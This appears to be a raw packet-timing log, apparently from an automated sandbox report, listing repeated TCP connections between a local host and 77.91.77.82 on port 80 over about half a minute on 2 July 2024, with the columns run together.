                                            Jul 2, 2024 08:28:54.142469883 CEST806405377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:54.142535925 CEST6405380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:54.253983021 CEST6405380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:54.254484892 CEST6405480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:54.259037018 CEST806405377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:54.259093046 CEST6405380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:54.259285927 CEST806405477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:54.259357929 CEST6405480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:54.259687901 CEST6405480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:54.264678001 CEST806405477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:54.943870068 CEST806405477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:54.944179058 CEST6405480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:54.946805954 CEST6405480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:54.948143005 CEST6405580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:54.951997042 CEST806405477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:54.952126980 CEST6405480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:54.952975035 CEST806405577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:54.956227064 CEST6405580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:54.956934929 CEST6405580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:54.961730003 CEST806405577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:55.654918909 CEST806405577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:55.654987097 CEST6405580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:55.769565105 CEST6405580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:55.770087957 CEST6405680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:55.774602890 CEST806405577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:55.774796963 CEST6405580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:55.774811983 CEST806405677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:55.774873018 CEST6405680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:55.775367975 CEST6405680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:55.780088902 CEST806405677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:56.489777088 CEST806405677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:56.492213011 CEST6405680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:56.494997978 CEST6405680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:56.494997025 CEST6405780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:56.500220060 CEST806405777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:56.500345945 CEST806405677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:56.504184008 CEST6405780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:56.504190922 CEST6405680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:56.612658024 CEST6405880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:56.617516041 CEST806405877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:56.620266914 CEST6405880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:56.624142885 CEST6405880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:56.629396915 CEST806405877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:57.305948019 CEST806405877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:57.306066036 CEST6405880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:57.308813095 CEST6405880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:57.312146902 CEST6405980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:57.313916922 CEST806405877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:57.316212893 CEST6405880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:57.317512989 CEST806405977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:57.320231915 CEST6405980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:57.324157000 CEST6405980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:57.331068993 CEST806405977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:58.033387899 CEST806405977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:58.033451080 CEST6405980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:58.144645929 CEST6405980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:58.145011902 CEST6406080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:58.149808884 CEST806405977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:58.149822950 CEST806406077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:58.149867058 CEST6405980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:58.149893999 CEST6406080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:58.150166035 CEST6406080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:58.154894114 CEST806406077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:58.839750051 CEST806406077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:58.840219975 CEST6406080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:58.842974901 CEST6406080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:58.842982054 CEST6406180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:58.847852945 CEST806406177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:58.848073959 CEST806406077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:58.848186016 CEST6406080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:58.848189116 CEST6406180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:58.848433018 CEST6406180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:58.853190899 CEST806406177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:59.568295956 CEST806406177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:59.568361044 CEST6406180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:59.675323009 CEST6406180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:59.675751925 CEST6406280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:59.680419922 CEST806406177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:59.680546045 CEST6406180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:59.680574894 CEST806406277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:28:59.680636883 CEST6406280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:59.680871964 CEST6406280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:28:59.685652018 CEST806406277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:00.388401985 CEST806406277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:00.388454914 CEST6406280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:00.392302036 CEST6406280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:00.392620087 CEST6406380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:00.397373915 CEST806406277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:00.397419930 CEST6406280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:00.397447109 CEST806406377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:00.397511959 CEST6406380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:00.397859097 CEST6406380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:00.402883053 CEST806406377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:01.094686985 CEST806406377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:01.095129967 CEST6406380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:01.206096888 CEST6406380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:01.208126068 CEST6406480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:01.449448109 CEST806406477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:01.449593067 CEST806406377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:01.449625969 CEST6406480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:01.449856997 CEST6406380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:01.450181961 CEST6406480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:01.454963923 CEST806406477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:02.155284882 CEST806406477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:02.155340910 CEST6406480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:02.159116983 CEST6406480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:02.159590006 CEST6406580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:02.164392948 CEST806406477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:02.164417028 CEST806406577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:02.164442062 CEST6406480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:02.164503098 CEST6406580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:02.164609909 CEST6406580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:02.169369936 CEST806406577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:02.864042997 CEST806406577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:02.864268064 CEST6406580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:02.972003937 CEST6406580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:02.972003937 CEST6406680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:02.976939917 CEST806406677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:02.977071047 CEST6406680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:02.977298021 CEST806406577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:02.977329016 CEST6406680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:02.977421999 CEST6406580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:02.982098103 CEST806406677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:03.692209005 CEST806406677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:03.692270041 CEST6406680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:03.695980072 CEST6406680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:03.696367025 CEST6406780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:03.701100111 CEST806406677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:03.701145887 CEST806406777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:03.701147079 CEST6406680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:03.701227903 CEST6406780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:03.701334000 CEST6406780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:03.706624031 CEST806406777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:04.417237043 CEST806406777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:04.417292118 CEST6406780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:04.534306049 CEST6406780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:04.534310102 CEST6406880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:04.539253950 CEST806406877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:04.539577961 CEST806406777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:04.539673090 CEST6406780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:04.539671898 CEST6406880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:04.539870977 CEST6406880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:04.544615030 CEST806406877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:05.266928911 CEST806406877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:05.267111063 CEST6406880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:05.270217896 CEST6406980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:05.270220995 CEST6406880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:05.275012016 CEST806406977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:05.275142908 CEST6406980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:05.275335073 CEST6406980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:05.275468111 CEST806406877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:05.275621891 CEST6406880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:05.280272007 CEST806406977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:05.992650986 CEST806406977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:05.992712975 CEST6406980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:06.113277912 CEST6406980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:06.113650084 CEST6407080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:06.118562937 CEST806407077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:06.118627071 CEST6407080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:06.118799925 CEST806406977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:06.118845940 CEST6406980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:06.118983984 CEST6407080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:06.123760939 CEST806407077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:06.803493977 CEST806407077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:06.803563118 CEST6407080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:06.806385994 CEST6407080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:06.806389093 CEST6407180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:06.811517954 CEST806407177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:06.811803102 CEST6407180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:06.811872959 CEST806407077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:06.811932087 CEST6407080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:06.812112093 CEST6407180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:06.816831112 CEST806407177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:07.511256933 CEST806407177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:07.511317015 CEST6407180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:07.628906012 CEST6407180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:07.629293919 CEST6407280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:07.634248018 CEST806407177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:07.634264946 CEST806407277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:07.634304047 CEST6407180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:07.634354115 CEST6407280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:07.634473085 CEST6407280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:07.639214993 CEST806407277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:08.350348949 CEST806407277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:08.350409031 CEST6407280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:08.354948044 CEST6407280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:08.355479002 CEST6407380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:08.360255003 CEST806407377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:08.360327005 CEST806407277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:08.360327959 CEST6407380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:08.360380888 CEST6407280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:08.361394882 CEST6407380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:08.366219044 CEST806407377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:09.083231926 CEST806407377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:09.083406925 CEST6407380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:09.190681934 CEST6407380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:09.190681934 CEST6407480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:09.195708036 CEST806407477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:09.196008921 CEST806407377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:09.196111917 CEST6407380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:09.196111917 CEST6407480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:09.196346998 CEST6407480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:09.201103926 CEST806407477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:09.884614944 CEST806407477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:09.884675026 CEST6407480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:09.888211012 CEST6407480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:09.888623953 CEST6407580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:09.893450022 CEST806407477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:09.893484116 CEST806407577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:09.893501997 CEST6407480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:09.893580914 CEST6407580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:09.893697023 CEST6407580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:09.898402929 CEST806407577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:10.606293917 CEST806407577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:10.606431961 CEST6407580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:10.721756935 CEST6407580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:10.722114086 CEST6407680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:10.726959944 CEST806407677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:10.727030039 CEST806407577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:10.727060080 CEST6407680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:10.727091074 CEST6407580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:10.727390051 CEST6407680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:10.732328892 CEST806407677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:11.451184034 CEST806407677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:11.452195883 CEST6407680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:11.455266953 CEST6407680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:11.455564976 CEST6407780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:11.460397005 CEST806407777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:11.460598946 CEST6407780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:11.460690022 CEST806407677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:11.460827112 CEST6407780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:11.460977077 CEST6407680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:11.465861082 CEST806407777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:12.171520948 CEST806407777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:12.171576977 CEST6407780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:12.285111904 CEST6407780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:12.285507917 CEST6407880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:12.290322065 CEST806407877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:12.290383101 CEST6407880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:12.290460110 CEST806407777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:12.290503979 CEST6407780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:12.290684938 CEST6407880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:12.295489073 CEST806407877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:12.983139038 CEST806407877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:12.984198093 CEST6407880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:12.987052917 CEST6407980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:12.987056017 CEST6407880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:12.991899967 CEST806407977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:12.992204905 CEST806407877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:12.992227077 CEST6407980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:12.996105909 CEST6407980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:12.996258020 CEST6407880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:13.000891924 CEST806407977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:13.681147099 CEST806407977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:13.681205988 CEST6407980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:13.800709009 CEST6407980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:13.801249981 CEST6408080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:13.805962086 CEST806407977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:13.806015968 CEST6407980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:13.806081057 CEST806408077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:13.806154013 CEST6408080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:13.806397915 CEST6408080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:13.811136961 CEST806408077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:14.512614965 CEST806408077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:14.512672901 CEST6408080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:14.516784906 CEST6408080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:14.516788960 CEST6408180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:14.521653891 CEST806408177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:14.521893024 CEST6408180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:14.521945953 CEST806408077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:14.522044897 CEST6408080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:14.522305965 CEST6408180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:14.527260065 CEST806408177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:15.246772051 CEST806408177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:15.248172998 CEST6408180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:15.362374067 CEST6408180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:15.362374067 CEST6408280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:15.367208004 CEST806408277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:15.367381096 CEST6408280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:15.367476940 CEST806408177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:15.367597103 CEST6408180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:15.367686033 CEST6408280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:15.372387886 CEST806408277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:16.066519976 CEST806408277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:16.066576958 CEST6408280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:16.070245028 CEST6408280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:16.070663929 CEST6408380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:16.076230049 CEST806408277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:16.076242924 CEST806408377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:16.076276064 CEST6408280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:16.076328039 CEST6408380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:16.076442957 CEST6408380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:16.083070040 CEST806408377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:16.780742884 CEST806408377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:16.784190893 CEST6408380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:16.895528078 CEST6408380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:16.896100044 CEST6408480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:16.900897026 CEST806408477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:16.901124001 CEST806408377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:16.904167891 CEST6408380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:16.904171944 CEST6408480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:16.904416084 CEST6408480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:16.909415960 CEST806408477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:17.622229099 CEST806408477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:17.622315884 CEST6408480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:17.625823975 CEST6408480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:17.626173019 CEST6408580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:17.631303072 CEST806408577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:17.631340981 CEST806408477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:17.631361961 CEST6408580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:17.631417036 CEST6408480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:17.631655931 CEST6408580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:17.636573076 CEST806408577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:18.339023113 CEST806408577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:18.339082003 CEST6408580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:18.457979918 CEST6408580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:18.458344936 CEST6408680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:18.463805914 CEST806408577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:18.463819027 CEST806408677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:18.463855982 CEST6408580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:18.463906050 CEST6408680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:18.464312077 CEST6408680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:18.469724894 CEST806408677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:19.178594112 CEST806408677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:19.178669930 CEST6408680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:19.181330919 CEST6408680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:19.184123039 CEST6408780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:19.186759949 CEST806408677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:19.186891079 CEST6408680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:19.188863993 CEST806408777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:19.188992977 CEST6408780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:19.189112902 CEST6408780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:19.194292068 CEST806408777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:19.916049957 CEST806408777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:19.916140079 CEST6408780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:20.034822941 CEST6408780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:20.035218954 CEST6408880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:20.040064096 CEST806408877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:20.040127039 CEST6408880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:20.040244102 CEST806408777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:20.040287971 CEST6408780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:20.040529013 CEST6408880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:20.045690060 CEST806408877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:20.752815962 CEST806408877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:29:20.752913952 CEST6408880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:20.755784035 CEST6408880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:20.756213903 CEST6408980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:29:20.760864973 CEST806408877.91.77.82192.168.2.4
